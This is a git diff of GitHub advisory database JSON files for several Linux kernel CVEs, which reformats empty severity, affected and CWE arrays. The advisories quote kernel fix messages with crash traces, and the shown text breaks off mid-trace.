a/advisories/unreviewed/2024/05/GHSA-6pvp-xcj5-pgh8/GHSA-6pvp-xcj5-pgh8.json b/advisories/unreviewed/2024/05/GHSA-6pvp-xcj5-pgh8/GHSA-6pvp-xcj5-pgh8.json index 83bd9e27dac..c4b3ff99518 100644 --- a/advisories/unreviewed/2024/05/GHSA-6pvp-xcj5-pgh8/GHSA-6pvp-xcj5-pgh8.json +++ b/advisories/unreviewed/2024/05/GHSA-6pvp-xcj5-pgh8/GHSA-6pvp-xcj5-pgh8.json @@ -7,12 +7,8 @@ "CVE-2021-47243" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsch_cake: Fix out of bounds when parsing TCP options and header\n\nThe TCP option parser in cake qdisc (cake_get_tcpopt and\ncake_tcph_may_drop) could read one byte out of bounds. When the length\nis 1, the execution flow gets into the loop, reads one byte of the\nopcode, and if the opcode is neither TCPOPT_EOL nor TCPOPT_NOP, it reads\none more byte, which exceeds the length of 1.\n\nThis fix is inspired by commit 9609dad263f8 (\"ipv4: tcp_input: fix stack\nout of bounds when parsing TCP options.\").\n\nv2 changes:\n\nAdded doff validation in cake_get_tcphdr to avoid parsing garbage as TCP\nheader. Although it wasn't strictly an out-of-bounds access (memory was\nallocated), garbage values could be read where CAKE expected the TCP\nheader if doff was smaller than 5.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-747f-wh5x-mp2p/GHSA-747f-wh5x-mp2p.json b/advisories/unreviewed/2024/05/GHSA-747f-wh5x-mp2p/GHSA-747f-wh5x-mp2p.json index cfa93497aaa..03b225ad6ce 100644 --- a/advisories/unreviewed/2024/05/GHSA-747f-wh5x-mp2p/GHSA-747f-wh5x-mp2p.json +++ b/advisories/unreviewed/2024/05/GHSA-747f-wh5x-mp2p/GHSA-747f-wh5x-mp2p.json @@ -7,12 +7,8 @@ "CVE-2021-47239" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: fix possible use-after-free in smsc75xx_bind\n\nThe commit 46a8b29c6306 (\"net: usb: fix memory leak in smsc75xx_bind\")\nfails to clean up the work scheduled in smsc75xx_reset->\nsmsc75xx_set_multicast, which leads to use-after-free if the work is\nscheduled to start after the deallocation. In addition, this patch\nalso removes a dangling pointer - dev->data[0].\n\nThis patch calls cancel_work_sync to cancel the scheduled work and set\nthe dangling pointer to NULL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-74hg-7r85-vvw3/GHSA-74hg-7r85-vvw3.json b/advisories/unreviewed/2024/05/GHSA-74hg-7r85-vvw3/GHSA-74hg-7r85-vvw3.json index 7de5653c847..230ca67277e 100644 --- a/advisories/unreviewed/2024/05/GHSA-74hg-7r85-vvw3/GHSA-74hg-7r85-vvw3.json +++ b/advisories/unreviewed/2024/05/GHSA-74hg-7r85-vvw3/GHSA-74hg-7r85-vvw3.json @@ -7,12 +7,8 @@ "CVE-2021-47229" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: aardvark: Fix kernel panic during PIO transfer\n\nTrying to start a new PIO transfer by writing value 0 in PIO_START register\nwhen previous transfer has not yet completed (which is indicated by value 1\nin PIO_START) causes an External Abort on CPU, which results in kernel\npanic:\n\n SError Interrupt on CPU0, code 0xbf000002 -- SError\n Kernel panic - not syncing: Asynchronous SError Interrupt\n\nTo prevent kernel panic, it is required to reject a new PIO transfer when\nprevious one has not finished yet.\n\nIf previous PIO transfer is not finished yet, the kernel may issue a new\nPIO request only if the previous PIO transfer timed out.\n\nIn the past the root cause of this issue was incorrectly identified (as it\noften happens during link retraining or after link down event) and special\nhack was implemented in Trusted Firmware to catch all SError events in EL3,\nto ignore errors with code 0xbf000002 and not forwarding any other errors\nto kernel and instead throw panic from EL3 Trusted Firmware handler.\n\nLinks to discussion and patches about this issue:\nhttps://git.trustedfirmware.org/TF-A/trusted-firmware-a.git/commit/?id=3c7dcdac5c50\nhttps://lore.kernel.org/linux-pci/20190316161243.29517-1-repk@triplefau.lt/\nhttps://lore.kernel.org/linux-pci/971be151d24312cc533989a64bd454b4@www.loen.fr/\nhttps://review.trustedfirmware.org/c/TF-A/trusted-firmware-a/+/1541\n\nBut the real cause was the fact that during link retraining or after link\ndown event the PIO transfer may take longer time, up to the 1.44s until it\ntimes out. This increased probability that a new PIO transfer would be\nissued by kernel while previous one has not finished yet.\n\nAfter applying this change into the kernel, it is possible to revert the\nmentioned TF-A hack and SError events do not have to be caught in TF-A EL3.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-7f2x-rjqg-7667/GHSA-7f2x-rjqg-7667.json b/advisories/unreviewed/2024/05/GHSA-7f2x-rjqg-7667/GHSA-7f2x-rjqg-7667.json index 65e81958422..f6a372acba1 100644 --- a/advisories/unreviewed/2024/05/GHSA-7f2x-rjqg-7667/GHSA-7f2x-rjqg-7667.json +++ b/advisories/unreviewed/2024/05/GHSA-7f2x-rjqg-7667/GHSA-7f2x-rjqg-7667.json @@ -7,12 +7,8 @@ "CVE-2021-47393" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (mlxreg-fan) Return non-zero value when fan current state is enforced from sysfs\n\nFan speed minimum can be enforced from sysfs. For example, setting\ncurrent fan speed to 20 is used to enforce fan speed to be at 100%\nspeed, 19 - to be not below 90% speed, etcetera. This feature provides\nability to limit fan speed according to some system wise\nconsiderations, like absence of some replaceable units or high system\nambient temperature.\n\nRequest for changing fan minimum speed is configuration request and can\nbe set only through 'sysfs' write procedure. In this situation value of\nargument 'state' is above nominal fan speed maximum.\n\nReturn non-zero code in this case to avoid\nthermal_cooling_device_stats_update() call, because in this case\nstatistics update violates thermal statistics table range.\nThe issues is observed in case kernel is configured with option\nCONFIG_THERMAL_STATISTICS.\n\nHere is the trace from KASAN:\n[ 159.506659] BUG: KASAN: slab-out-of-bounds in thermal_cooling_device_stats_update+0x7d/0xb0\n[ 159.516016] Read of size 4 at addr ffff888116163840 by task hw-management.s/7444\n[ 159.545625] Call Trace:\n[ 159.548366] dump_stack+0x92/0xc1\n[ 159.552084] ? thermal_cooling_device_stats_update+0x7d/0xb0\n[ 159.635869] thermal_zone_device_update+0x345/0x780\n[ 159.688711] thermal_zone_device_set_mode+0x7d/0xc0\n[ 159.694174] mlxsw_thermal_modules_init+0x48f/0x590 [mlxsw_core]\n[ 159.700972] ? mlxsw_thermal_set_cur_state+0x5a0/0x5a0 [mlxsw_core]\n[ 159.731827] mlxsw_thermal_init+0x763/0x880 [mlxsw_core]\n[ 160.070233] RIP: 0033:0x7fd995909970\n[ 160.074239] Code: 73 01 c3 48 8b 0d 28 d5 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d 99 2d 2c 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ..\n[ 160.095242] RSP: 002b:00007fff54f5d938 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[ 160.103722] RAX: ffffffffffffffda RBX: 0000000000000013 RCX: 00007fd995909970\n[ 160.111710] RDX: 0000000000000013 RSI: 0000000001906008 RDI: 0000000000000001\n[ 160.119699] RBP: 0000000001906008 R08: 00007fd995bc9760 R09: 00007fd996210700\n[ 160.127687] R10: 0000000000000073 R11: 0000000000000246 R12: 0000000000000013\n[ 160.135673] R13: 0000000000000001 R14: 00007fd995bc8600 R15: 0000000000000013\n[ 160.143671]\n[ 160.145338] Allocated by task 2924:\n[ 160.149242] kasan_save_stack+0x19/0x40\n[ 160.153541] __kasan_kmalloc+0x7f/0xa0\n[ 160.157743] __kmalloc+0x1a2/0x2b0\n[ 160.161552] thermal_cooling_device_setup_sysfs+0xf9/0x1a0\n[ 160.167687] __thermal_cooling_device_register+0x1b5/0x500\n[ 160.173833] devm_thermal_of_cooling_device_register+0x60/0xa0\n[ 160.180356] mlxreg_fan_probe+0x474/0x5e0 [mlxreg_fan]\n[ 160.248140]\n[ 160.249807] The buggy address belongs to the object at ffff888116163400\n[ 160.249807] which belongs to the cache kmalloc-1k of size 1024\n[ 160.263814] The buggy address is located 64 bytes to the right of\n[ 160.263814] 1024-byte region [ffff888116163400, ffff888116163800)\n[ 160.277536] The buggy address belongs to the page:\n[ 160.282898] page:0000000012275840 refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff888116167000 pfn:0x116160\n[ 160.294872] head:0000000012275840 order:3 compound_mapcount:0 compound_pincount:0\n[ 160.303251] flags: 0x200000000010200(slab|head|node=0|zone=2)\n[ 160.309694] raw: 0200000000010200 ffffea00046f7208 ffffea0004928208 ffff88810004dbc0\n[ 160.318367] raw: ffff888116167000 00000000000a0006 00000001ffffffff 0000000000000000\n[ 160.327033] page dumped because: kasan: bad access detected\n[ 160.333270]\n[ 160.334937] Memory state around the buggy address:\n[ 160.356469] >ffff888116163800: fc ..", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-7r2w-9mrv-hfqg/GHSA-7r2w-9mrv-hfqg.json b/advisories/unreviewed/2024/05/GHSA-7r2w-9mrv-hfqg/GHSA-7r2w-9mrv-hfqg.json index f5e9b09a707..b9c935e7ac3 100644 --- a/advisories/unreviewed/2024/05/GHSA-7r2w-9mrv-hfqg/GHSA-7r2w-9mrv-hfqg.json +++ b/advisories/unreviewed/2024/05/GHSA-7r2w-9mrv-hfqg/GHSA-7r2w-9mrv-hfqg.json @@ -7,12 +7,8 @@ "CVE-2021-47237" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hamradio: fix memory leak in mkiss_close\n\nMy local syzbot instance hit memory leak in\nmkiss_open()[1]. The problem was in missing\nfree_netdev() in mkiss_close().\n\nIn mkiss_open() netdevice is allocated and then\nregistered, but in mkiss_close() netdevice was\nonly unregistered, but not freed.\n\nFail log:\n\nBUG: memory leak\nunreferenced object 0xffff8880281ba000 (size 4096):\n comm \"syz-executor.1\", pid 11443, jiffies 4295046091 (age 17.660s)\n hex dump (first 32 bytes):\n 61 78 30 00 00 00 00 00 00 00 00 00 00 00 00 00 ax0.............\n 00 27 fa 2a 80 88 ff ff 00 00 00 00 00 00 00 00 .'.*............\n backtrace:\n [] kvmalloc_node+0x61/0xf0\n [] alloc_netdev_mqs+0x98/0xe80\n [] mkiss_open+0xb2/0x6f0 [1]\n [] tty_ldisc_open+0x9b/0x110\n [] tty_set_ldisc+0x2e8/0x670\n [] tty_ioctl+0xda3/0x1440\n [] __x64_sys_ioctl+0x193/0x200\n [] do_syscall_64+0x3a/0xb0\n [] entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nBUG: memory leak\nunreferenced object 0xffff8880141a9a00 (size 96):\n comm \"syz-executor.1\", pid 11443, jiffies 4295046091 (age 17.660s)\n hex dump (first 32 bytes):\n e8 a2 1b 28 80 88 ff ff e8 a2 1b 28 80 88 ff ff ...(.......(....\n 98 92 9c aa b0 40 02 00 00 00 00 00 00 00 00 00 .....@..........\n backtrace:\n [] __hw_addr_create_ex+0x5b/0x310\n [] __hw_addr_add_ex+0x1f8/0x2b0\n [] dev_addr_init+0x10b/0x1f0\n [] alloc_netdev_mqs+0x13b/0xe80\n [] mkiss_open+0xb2/0x6f0 [1]\n [] tty_ldisc_open+0x9b/0x110\n [] tty_set_ldisc+0x2e8/0x670\n [] tty_ioctl+0xda3/0x1440\n [] __x64_sys_ioctl+0x193/0x200\n [] do_syscall_64+0x3a/0xb0\n [] entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nBUG: memory leak\nunreferenced object 0xffff8880219bfc00 (size 512):\n comm \"syz-executor.1\", pid 11443, jiffies 4295046091 (age 17.660s)\n hex dump (first 32 bytes):\n 00 a0 1b 28 80 88 ff ff 80 8f b1 8d ff ff ff ff ...(............\n 80 8f b1 8d ff ff ff ff 00 00 00 00 00 00 00 00 ................\n backtrace:\n [] kvmalloc_node+0x61/0xf0\n [] alloc_netdev_mqs+0x777/0xe80\n [] mkiss_open+0xb2/0x6f0 [1]\n [] tty_ldisc_open+0x9b/0x110\n [] tty_set_ldisc+0x2e8/0x670\n [] tty_ioctl+0xda3/0x1440\n [] __x64_sys_ioctl+0x193/0x200\n [] do_syscall_64+0x3a/0xb0\n [] entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nBUG: memory leak\nunreferenced object 0xffff888029b2b200 (size 256):\n comm \"syz-executor.1\", pid 11443, jiffies 4295046091 (age 17.660s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [] kvmalloc_node+0x61/0xf0\n [] alloc_netdev_mqs+0x912/0xe80\n [] mkiss_open+0xb2/0x6f0 [1]\n [] tty_ldisc_open+0x9b/0x110\n [] tty_set_ldisc+0x2e8/0x670\n [] tty_ioctl+0xda3/0x1440\n [] __x64_sys_ioctl+0x193/0x200\n [] do_syscall_64+0x3a/0xb0\n [] entry_SYSCALL_64_after_hwframe+0x44/0xae", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-84wp-3676-5rx2/GHSA-84wp-3676-5rx2.json b/advisories/unreviewed/2024/05/GHSA-84wp-3676-5rx2/GHSA-84wp-3676-5rx2.json index 10a18559bc8..7d81cdec06c 100644 --- a/advisories/unreviewed/2024/05/GHSA-84wp-3676-5rx2/GHSA-84wp-3676-5rx2.json +++ b/advisories/unreviewed/2024/05/GHSA-84wp-3676-5rx2/GHSA-84wp-3676-5rx2.json @@ -7,12 +7,8 @@ "CVE-2021-47273" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3-meson-g12a: fix usb2 PHY glue init when phy0 is disabled\n\nWhen only PHY1 is used (for example on Odroid-HC4), the regmap init code\nuses the usb2 ports when doesn't initialize the PHY1 regmap entry.\n\nThis fixes:\nUnable to handle kernel NULL pointer dereference at virtual address 0000000000000020\n...\npc : regmap_update_bits_base+0x40/0xa0\nlr : dwc3_meson_g12a_usb2_init_phy+0x4c/0xf8\n...\nCall trace:\nregmap_update_bits_base+0x40/0xa0\ndwc3_meson_g12a_usb2_init_phy+0x4c/0xf8\ndwc3_meson_g12a_usb2_init+0x7c/0xc8\ndwc3_meson_g12a_usb_init+0x28/0x48\ndwc3_meson_g12a_probe+0x298/0x540\nplatform_probe+0x70/0xe0\nreally_probe+0xf0/0x4d8\ndriver_probe_device+0xfc/0x168\n...", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-85h7-g6vm-p392/GHSA-85h7-g6vm-p392.json b/advisories/unreviewed/2024/05/GHSA-85h7-g6vm-p392/GHSA-85h7-g6vm-p392.json index 7f888925e1a..9e53dd3967c 100644 --- a/advisories/unreviewed/2024/05/GHSA-85h7-g6vm-p392/GHSA-85h7-g6vm-p392.json +++ b/advisories/unreviewed/2024/05/GHSA-85h7-g6vm-p392/GHSA-85h7-g6vm-p392.json @@ -7,12 +7,8 @@ "CVE-2021-47289" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: fix NULL pointer dereference\n\nCommit 71f642833284 (\"ACPI: utils: Fix reference counting in\nfor_each_acpi_dev_match()\") started doing \"acpi_dev_put()\" on a pointer\nthat was possibly NULL. That fails miserably, because that helper\ninline function is not set up to handle that case.\n\nJust make acpi_dev_put() silently accept a NULL pointer, rather than\ncalling down to put_device() with an invalid offset off that NULL\npointer.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-8cxw-6695-4jq3/GHSA-8cxw-6695-4jq3.json b/advisories/unreviewed/2024/05/GHSA-8cxw-6695-4jq3/GHSA-8cxw-6695-4jq3.json index 3855bec5e73..895bb3a9b1d 100644 --- a/advisories/unreviewed/2024/05/GHSA-8cxw-6695-4jq3/GHSA-8cxw-6695-4jq3.json +++ b/advisories/unreviewed/2024/05/GHSA-8cxw-6695-4jq3/GHSA-8cxw-6695-4jq3.json @@ -7,12 +7,8 @@ "CVE-2021-47266" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/ipoib: Fix warning caused by destroying non-initial netns\n\nAfter the commit 5ce2dced8e95 (\"RDMA/ipoib: Set rtnl_link_ops for ipoib\ninterfaces\"), if the IPoIB device is moved to non-initial netns,\ndestroying that netns lets the device vanish instead of moving it back to\nthe initial netns, This is happening because default_device_exit() skips\nthe interfaces due to having rtnl_link_ops set.\n\nSteps to reporoduce:\n ip netns add foo\n ip link set mlx5_ib0 netns foo\n ip netns delete foo\n\nWARNING: CPU: 1 PID: 704 at net/core/dev.c:11435 netdev_exit+0x3f/0x50\nModules linked in: xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT\nnf_reject_ipv4 nft_compat nft_counter nft_chain_nat nf_nat nf_conntrack\nnf_defrag_ipv6 nf_defrag_ipv4 nf_tables nfnetlink tun d\n fuse\nCPU: 1 PID: 704 Comm: kworker/u64:3 Tainted: G S W 5.13.0-rc1+ #1\nHardware name: Dell Inc. PowerEdge R630/02C2CP, BIOS 2.1.5 04/11/2016\nWorkqueue: netns cleanup_net\nRIP: 0010:netdev_exit+0x3f/0x50\nCode: 48 8b bb 30 01 00 00 e8 ef 81 b1 ff 48 81 fb c0 3a 54 a1 74 13 48\n8b 83 90 00 00 00 48 81 c3 90 00 00 00 48 39 d8 75 02 5b c3 <0f> 0b 5b\nc3 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 0f 1f 44 00\nRSP: 0018:ffffb297079d7e08 EFLAGS: 00010206\nRAX: ffff8eb542c00040 RBX: ffff8eb541333150 RCX: 000000008010000d\nRDX: 000000008010000e RSI: 000000008010000d RDI: ffff8eb440042c00\nRBP: ffffb297079d7e48 R08: 0000000000000001 R09: ffffffff9fdeac00\nR10: ffff8eb5003be000 R11: 0000000000000001 R12: ffffffffa1545620\nR13: ffffffffa1545628 R14: 0000000000000000 R15: ffffffffa1543b20\nFS: 0000000000000000(0000) GS:ffff8ed37fa00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005601b5f4c2e8 CR3: 0000001fc8c10002 CR4: 00000000003706e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n ops_exit_list.isra.9+0x36/0x70\n cleanup_net+0x234/0x390\n process_one_work+0x1cb/0x360\n ? process_one_work+0x360/0x360\n worker_thread+0x30/0x370\n ? process_one_work+0x360/0x360\n kthread+0x116/0x130\n ? kthread_park+0x80/0x80\n ret_from_fork+0x22/0x30\n\nTo avoid the above warning and later on the kernel panic that could happen\non shutdown due to a NULL pointer dereference, make sure to set the\nnetns_refund flag that was introduced by commit 3a5ca857079e (\"can: dev:\nMove device back to init netns on owning netns delete\") to properly\nrestore the IPoIB interfaces to the initial netns.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-8fm5-v3c4-vrmq/GHSA-8fm5-v3c4-vrmq.json b/advisories/unreviewed/2024/05/GHSA-8fm5-v3c4-vrmq/GHSA-8fm5-v3c4-vrmq.json index 3b137de060e..5694d171706 100644 --- a/advisories/unreviewed/2024/05/GHSA-8fm5-v3c4-vrmq/GHSA-8fm5-v3c4-vrmq.json +++ b/advisories/unreviewed/2024/05/GHSA-8fm5-v3c4-vrmq/GHSA-8fm5-v3c4-vrmq.json @@ -7,12 +7,8 @@ "CVE-2021-47299" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nxdp, net: Fix use-after-free in bpf_xdp_link_release\n\nThe problem occurs between dev_get_by_index() and dev_xdp_attach_link().\nAt this point, dev_xdp_uninstall() is called. Then xdp link will not be\ndetached automatically when dev is released. But link->dev already\npoints to dev, when xdp link is released, dev will still be accessed,\nbut dev has been released.\n\ndev_get_by_index() |\nlink->dev = dev |\n | rtnl_lock()\n | unregister_netdevice_many()\n | dev_xdp_uninstall()\n | rtnl_unlock()\nrtnl_lock(); |\ndev_xdp_attach_link() |\nrtnl_unlock(); |\n | netdev_run_todo() // dev released\nbpf_xdp_link_release() |\n /* access dev. |\n use-after-free */ |\n\n[ 45.966867] BUG: KASAN: use-after-free in bpf_xdp_link_release+0x3b8/0x3d0\n[ 45.967619] Read of size 8 at addr ffff00000f9980c8 by task a.out/732\n[ 45.968297]\n[ 45.968502] CPU: 1 PID: 732 Comm: a.out Not tainted 5.13.0+ #22\n[ 45.969222] Hardware name: linux,dummy-virt (DT)\n[ 45.969795] Call trace:\n[ 45.970106] dump_backtrace+0x0/0x4c8\n[ 45.970564] show_stack+0x30/0x40\n[ 45.970981] dump_stack_lvl+0x120/0x18c\n[ 45.971470] print_address_description.constprop.0+0x74/0x30c\n[ 45.972182] kasan_report+0x1e8/0x200\n[ 45.972659] __asan_report_load8_noabort+0x2c/0x50\n[ 45.973273] bpf_xdp_link_release+0x3b8/0x3d0\n[ 45.973834] bpf_link_free+0xd0/0x188\n[ 45.974315] bpf_link_put+0x1d0/0x218\n[ 45.974790] bpf_link_release+0x3c/0x58\n[ 45.975291] __fput+0x20c/0x7e8\n[ 45.975706] ____fput+0x24/0x30\n[ 45.976117] task_work_run+0x104/0x258\n[ 45.976609] do_notify_resume+0x894/0xaf8\n[ 45.977121] work_pending+0xc/0x328\n[ 45.977575]\n[ 45.977775] The buggy address belongs to the page:\n[ 45.978369] page:fffffc00003e6600 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x4f998\n[ 45.979522] flags: 0x7fffe0000000000(node=0|zone=0|lastcpupid=0x3ffff)\n[ 45.980349] raw: 07fffe0000000000 fffffc00003e6708 ffff0000dac3c010 0000000000000000\n[ 45.981309] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000\n[ 45.982259] page dumped because: kasan: bad access detected\n[ 45.982948]\n[ 45.983153] Memory state around the buggy address:\n[ 45.983753] ffff00000f997f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\n[ 45.984645] ffff00000f998000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\n[ 45.985533] >ffff00000f998080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\n[ 45.986419] ^\n[ 45.987112] ffff00000f998100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\n[ 45.988006] ffff00000f998180: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\n[ 45.988895] ==================================================================\n[ 45.989773] Disabling lock debugging due to kernel taint\n[ 45.990552] Kernel panic - not syncing: panic_on_warn set ...\n[ 45.991166] CPU: 1 PID: 732 Comm: a.out Tainted: G B 5.13.0+ #22\n[ 45.991929] Hardware name: linux,dummy-virt (DT)\n[ 45.992448] Call trace:\n[ 45.992753] dump_backtrace+0x0/0x4c8\n[ 45.993208] show_stack+0x30/0x40\n[ 45.993627] dump_stack_lvl+0x120/0x18c\n[ 45.994113] dump_stack+0x1c/0x34\n[ 45.994530] panic+0x3a4/0x7d8\n[ 45.994930] end_report+0x194/0x198\n[ 45.995380] kasan_report+0x134/0x200\n[ 45.995850] __asan_report_load8_noabort+0x2c/0x50\n[ 45.996453] bpf_xdp_link_release+0x3b8/0x3d0\n[ 45.997007] bpf_link_free+0xd0/0x188\n[ 45.997474] bpf_link_put+0x1d0/0x218\n[ 45.997942] bpf_link_release+0x3c/0x58\n[ 45.998429] __fput+0x20c/0x7e8\n[ 45.998833] ____fput+0x24/0x30\n[ 45.999247] task_work_run+0x104/0x258\n[ 45.999731] do_notify_resume+0x894/0xaf8\n[ 46.000236] work_pending\n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-8g98-8rxj-3j4q/GHSA-8g98-8rxj-3j4q.json b/advisories/unreviewed/2024/05/GHSA-8g98-8rxj-3j4q/GHSA-8g98-8rxj-3j4q.json index e4181ebf227..f9a0f23ffbb 100644 --- a/advisories/unreviewed/2024/05/GHSA-8g98-8rxj-3j4q/GHSA-8g98-8rxj-3j4q.json +++ b/advisories/unreviewed/2024/05/GHSA-8g98-8rxj-3j4q/GHSA-8g98-8rxj-3j4q.json @@ -7,12 +7,8 @@ "CVE-2021-47268" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: tcpm: cancel vdm and state machine hrtimer when unregister tcpm port\n\nA pending hrtimer may expire after the kthread_worker of tcpm port\nis destroyed, see below kernel dump when do module unload, fix it\nby cancel the 2 hrtimers.\n\n[ 111.517018] Unable to handle kernel paging request at virtual address ffff8000118cb880\n[ 111.518786] blk_update_request: I/O error, dev sda, sector 60061185 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0\n[ 111.526594] Mem abort info:\n[ 111.526597] ESR = 0x96000047\n[ 111.526600] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 111.526604] SET = 0, FnV = 0\n[ 111.526607] EA = 0, S1PTW = 0\n[ 111.526610] Data abort info:\n[ 111.526612] ISV = 0, ISS = 0x00000047\n[ 111.526615] CM = 0, WnR = 1\n[ 111.526619] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000041d75000\n[ 111.526623] [ffff8000118cb880] pgd=10000001bffff003, p4d=10000001bffff003, pud=10000001bfffe003, pmd=10000001bfffa003, pte=0000000000000000\n[ 111.526642] Internal error: Oops: 96000047 [#1] PREEMPT SMP\n[ 111.526647] Modules linked in: dwc3_imx8mp dwc3 phy_fsl_imx8mq_usb [last unloaded: tcpci]\n[ 111.526663] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.13.0-rc4-00927-gebbe9dbd802c-dirty #36\n[ 111.526670] Hardware name: NXP i.MX8MPlus EVK board (DT)\n[ 111.526674] pstate: 800000c5 (Nzcv daIF -PAN -UAO -TCO BTYPE=--)\n[ 111.526681] pc : queued_spin_lock_slowpath+0x1a0/0x390\n[ 111.526695] lr : _raw_spin_lock_irqsave+0x88/0xb4\n[ 111.526703] sp : ffff800010003e20\n[ 111.526706] x29: ffff800010003e20 x28: ffff00017f380180\n[ 111.537156] buffer_io_error: 6 callbacks suppressed\n[ 111.537162] Buffer I/O error on dev sda1, logical block 60040704, async page read\n[ 111.539932] x27: ffff00017f3801c0\n[ 111.539938] x26: ffff800010ba2490 x25: 0000000000000000 x24: 0000000000000001\n[ 111.543025] blk_update_request: I/O error, dev sda, sector 60061186 op 0x0:(READ) flags 0x0 phys_seg 7 prio class 0\n[ 111.548304]\n[ 111.548306] x23: 00000000000000c0 x22: ffff0000c2a9f184 x21: ffff00017f380180\n[ 111.551374] Buffer I/O error on dev sda1, logical block 60040705, async page read\n[ 111.554499]\n[ 111.554503] x20: ffff0000c5f14210 x19: 00000000000000c0 x18: 0000000000000000\n[ 111.557391] Buffer I/O error on dev sda1, logical block 60040706, async page read\n[ 111.561218]\n[ 111.561222] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\n[ 111.564205] Buffer I/O error on dev sda1, logical block 60040707, async page read\n[ 111.570887] x14: 00000000000000f5 x13: 0000000000000001 x12: 0000000000000040\n[ 111.570902] x11: ffff0000c05ac6d8\n[ 111.583420] Buffer I/O error on dev sda1, logical block 60040708, async page read\n[ 111.588978] x10: 0000000000000000 x9 : 0000000000040000\n[ 111.588988] x8 : 0000000000000000\n[ 111.597173] Buffer I/O error on dev sda1, logical block 60040709, async page read\n[ 111.605766] x7 : ffff00017f384880 x6 : ffff8000118cb880\n[ 111.605777] x5 : ffff00017f384880\n[ 111.611094] Buffer I/O error on dev sda1, logical block 60040710, async page read\n[ 111.617086] x4 : 0000000000000000 x3 : ffff0000c2a9f184\n[ 111.617096] x2 : ffff8000118cb880\n[ 